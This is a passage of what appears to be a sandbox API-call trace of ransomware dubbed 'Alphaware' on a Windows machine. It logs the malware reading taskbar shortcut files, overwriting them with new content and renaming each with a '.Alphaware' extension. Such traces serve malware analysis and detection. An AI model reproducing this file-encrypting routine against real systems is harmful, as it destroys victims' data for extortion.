(normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\internet explorer (2).lnk"), fInfoLevelId=0x0, lpFileInformation=0x23e930 | out: lpFileInformation=0x23e930*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7f0f5210, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7f0f5210, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x89cedfc0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x860)) returned 1 [0093.305] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e5b8) returned 1 [0093.305] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Internet Explorer (2).lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\internet explorer (2).lnk"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Internet Explorer (2).lnk.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\internet explorer (2).lnk.alphaware")) returned 1 [0093.307] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Internet Explorer.lnk", dwFileAttributes=0x80) returned 1 [0093.308] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e6d8) returned 1 [0093.308] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Internet Explorer.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\internet explorer.lnk"), fInfoLevelId=0x0, lpFileInformation=0x24d2810 | out: lpFileInformation=0x24d2810*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x799de350, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x799de350, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x921e7f, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x5a9)) returned 1 [0093.308] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e688) returned 1 [0093.308] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e768) returned 1 [0093.308] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Internet Explorer.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\internet explorer.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0093.308] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e6d8) returned 1 [0093.308] GetFileSize (in: hFile=0x250, lpFileSizeHigh=0x23e8e8 | out: lpFileSizeHigh=0x23e8e8*=0x0) returned 0x5a9 [0093.308] ReadFile (in: hFile=0x250, lpBuffer=0x24d3160, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e818, lpOverlapped=0x0 | out: lpBuffer=0x24d3160*, lpNumberOfBytesRead=0x23e818*=0x5a9, lpOverlapped=0x0) returned 1 [0093.336] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e698) returned 1 [0093.336] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Internet Explorer.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\internet explorer.lnk"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0093.488] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e608) returned 1 [0093.490] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e608) returned 1 [0093.490] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Internet Explorer.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\internet explorer.lnk"), fInfoLevelId=0x0, lpFileInformation=0x23e930 | out: lpFileInformation=0x23e930*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x799de350, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x799de350, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x89eb7040, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x860)) returned 1 [0093.490] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e5b8) returned 1 [0093.490] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Internet Explorer.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\internet explorer.lnk"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Internet Explorer.lnk.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\internet explorer.lnk.alphaware")) returned 1 [0093.491] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Explorer (2).lnk", dwFileAttributes=0x80) returned 1 [0093.492] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e6d8) returned 1 [0093.492] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Explorer (2).lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\windows explorer (2).lnk"), fInfoLevelId=0x0, lpFileInformation=0x241ba48 | out: lpFileInformation=0x241ba48*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x7f10d8b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7f10d8b0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7dfa026d, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x4cc)) returned 1 [0093.492] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e688) returned 1 [0093.492] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e768) returned 1 [0093.492] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Explorer (2).lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\windows explorer (2).lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0093.492] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e6d8) returned 1 [0093.492] GetFileSize (in: hFile=0x250, lpFileSizeHigh=0x23e8e8 | out: lpFileSizeHigh=0x23e8e8*=0x0) returned 0x4cc [0093.492] ReadFile (in: hFile=0x250, lpBuffer=0x241c2c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e818, lpOverlapped=0x0 | out: lpBuffer=0x241c2c0*, lpNumberOfBytesRead=0x23e818*=0x4cc, lpOverlapped=0x0) returned 1 [0093.518] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e698) returned 1 [0093.519] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Explorer (2).lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\windows explorer (2).lnk"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0093.520] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e608) returned 1 [0093.522] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e608) returned 1 [0093.522] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Explorer (2).lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\windows explorer (2).lnk"), fInfoLevelId=0x0, lpFileInformation=0x23e930 | out: lpFileInformation=0x23e930*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7f10d8b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7f10d8b0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x89f03300, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x734)) returned 1 [0093.522] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e5b8) returned 1 [0093.522] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Explorer (2).lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\windows explorer (2).lnk"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Explorer (2).lnk.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\windows explorer (2).lnk.alphaware")) returned 1 [0093.524] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Explorer.lnk", dwFileAttributes=0x80) returned 1 [0093.546] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e6d8) returned 1 [0093.547] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Explorer.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\windows explorer.lnk"), fInfoLevelId=0x0, lpFileInformation=0x249e9e0 | out: lpFileInformation=0x249e9e0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x799de350, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x799de350, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7dfa026d, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x4cc)) returned 1 [0093.547] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e688) returned 1 [0093.547] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e768) returned 1 [0093.547] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Explorer.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\windows explorer.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0093.547] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e6d8) returned 1 [0093.547] GetFileSize (in: hFile=0x250, lpFileSizeHigh=0x23e8e8 | out: lpFileSizeHigh=0x23e8e8*=0x0) returned 0x4cc [0093.548] ReadFile (in: hFile=0x250, lpBuffer=0x249f250, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e818, lpOverlapped=0x0 | out: lpBuffer=0x249f250*, lpNumberOfBytesRead=0x23e818*=0x4cc, lpOverlapped=0x0) returned 1 [0093.573] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e698) returned 1 [0093.573] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Explorer.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\windows explorer.lnk"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0093.575] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e608) returned 1 [0093.576] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e608) returned 1 [0093.576] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Explorer.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\windows explorer.lnk"), fInfoLevelId=0x0, lpFileInformation=0x23e930 | out: lpFileInformation=0x23e930*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x799de350, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x799de350, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x89f9b880, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x734)) returned 1 [0093.576] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e5b8) returned 1 [0093.576] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Explorer.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\windows explorer.lnk"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Explorer.lnk.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\windows explorer.lnk.alphaware")) returned 1 [0093.577] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Media Player (2).lnk", dwFileAttributes=0x80) returned 1 [0093.577] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e6d8) returned 1 [0093.577] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Media Player (2).lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\windows media player (2).lnk"), fInfoLevelId=0x0, lpFileInformation=0x2521278 | out: lpFileInformation=0x2521278*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x7f125f50, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7f125f50, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xd869fe87, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x60b)) returned 1 [0093.577] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e688) returned 1 [0093.577] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e768) returned 1 [0093.578] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Media Player (2).lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\windows media player (2).lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0093.578] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e6d8) returned 1 [0093.578] GetFileSize (in: hFile=0x250, lpFileSizeHigh=0x23e8e8 | out: lpFileSizeHigh=0x23e8e8*=0x0) returned 0x60b [0093.578] ReadFile (in: hFile=0x250, lpBuffer=0x2521c68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e818, lpOverlapped=0x0 | out: lpBuffer=0x2521c68*, lpNumberOfBytesRead=0x23e818*=0x60b, lpOverlapped=0x0) returned 1 [0093.614] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e698) returned 1 [0093.614] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Media Player (2).lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\windows media player (2).lnk"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0093.616] GetFileType (hFile=0x250) returned 0x1 [0093.616] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e608) returned 1 [0093.616] GetFileType (hFile=0x250) returned 0x1 [0093.616] WriteFile (in: hFile=0x250, lpBuffer=0x25a2e20*, nNumberOfBytesToWrite=0x8e0, lpNumberOfBytesWritten=0x23e6d8, lpOverlapped=0x0 | out: lpBuffer=0x25a2e20*, lpNumberOfBytesWritten=0x23e6d8*=0x8e0, lpOverlapped=0x0) returned 1 [0093.617] CloseHandle (hObject=0x250) returned 1 [0093.620] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Media Player (2).lnk", nBufferLength=0x105, lpBuffer=0x23e3f0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Media Player (2).lnk", lpFilePart=0x0) returned 0x7c [0093.620] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Media Player (2).lnk.Alphaware", nBufferLength=0x105, lpBuffer=0x23e3f0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Media Player (2).lnk.Alphaware", lpFilePart=0x0) returned 0x86 [0093.620] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e608) returned 1 [0093.620] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Media Player (2).lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\windows media player (2).lnk"), fInfoLevelId=0x0, lpFileInformation=0x23e930 | out: lpFileInformation=0x23e930*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7f125f50, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7f125f50, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x8a00dca0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x8e0)) returned 1 [0093.620] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e5b8) returned 1 [0093.620] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Media Player (2).lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\windows media player (2).lnk"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Media Player (2).lnk.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\windows media player (2).lnk.alphaware")) returned 1 [0093.631] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Media Player.lnk", nBufferLength=0x105, lpBuffer=0x23e480, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Media Player.lnk", lpFilePart=0x0) returned 0x78 [0093.631] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Media Player.lnk", dwFileAttributes=0x80) returned 1 [0093.633] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e6d8) returned 1 [0093.633] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Media Player.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\windows media player.lnk"), fInfoLevelId=0x0, lpFileInformation=0x25a49e0 | out: lpFileInformation=0x25a49e0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x799de350, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x799de350, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x2e24b3, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x60b)) returned 1 [0093.633] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e688) returned 1 [0093.633] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Media Player.lnk", nBufferLength=0x105, lpBuffer=0x23e250, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Media Player.lnk", lpFilePart=0x0) returned 0x78 [0093.633] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e768) returned 1 [0093.633] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Media Player.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\windows media player.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0093.634] GetFileType (hFile=0x250) returned 0x1 [0093.634] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e6d8) returned 1 [0093.634] GetFileType (hFile=0x250) returned 0x1 [0093.634] GetFileSize (in: hFile=0x250, lpFileSizeHigh=0x23e8e8 | out: lpFileSizeHigh=0x23e8e8*=0x0) returned 0x60b [0093.634] ReadFile (in: hFile=0x250, lpBuffer=0x25a53b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e818, lpOverlapped=0x0 | out: lpBuffer=0x25a53b0*, lpNumberOfBytesRead=0x23e818*=0x60b, lpOverlapped=0x0) returned 1 [0093.636] CloseHandle (hObject=0x250) returned 1 [0093.703] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e698) returned 1 [0093.703] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Media Player.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\windows media player.lnk"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0093.705] GetFileType (hFile=0x250) returned 0x1 [0093.705] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e608) returned 1 [0093.705] GetFileType (hFile=0x250) returned 0x1 [0093.706] WriteFile (in: hFile=0x250, lpBuffer=0x2427eb0*, nNumberOfBytesToWrite=0x8e0, lpNumberOfBytesWritten=0x23e6d8, lpOverlapped=0x0 | out: lpBuffer=0x2427eb0*, lpNumberOfBytesWritten=0x23e6d8*=0x8e0, lpOverlapped=0x0) returned 1 [0093.707] CloseHandle (hObject=0x250) returned 1 [0093.709] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e608) returned 1 [0093.709] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Media Player.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\windows media player.lnk"), fInfoLevelId=0x0, lpFileInformation=0x23e930 | out: lpFileInformation=0x23e930*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x799de350, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x799de350, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x8a0cc380, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x8e0)) returned 1 [0093.709] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e5b8) returned 1 [0093.709] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Media Player.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\windows media player.lnk"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Media Player.lnk.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\windows media player.lnk.alphaware")) returned 1 [0093.711] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e918) returned 1 [0093.711] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar", nBufferLength=0x105, lpBuffer=0x23e3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar", lpFilePart=0x0) returned 0x5f [0093.711] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\*" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user 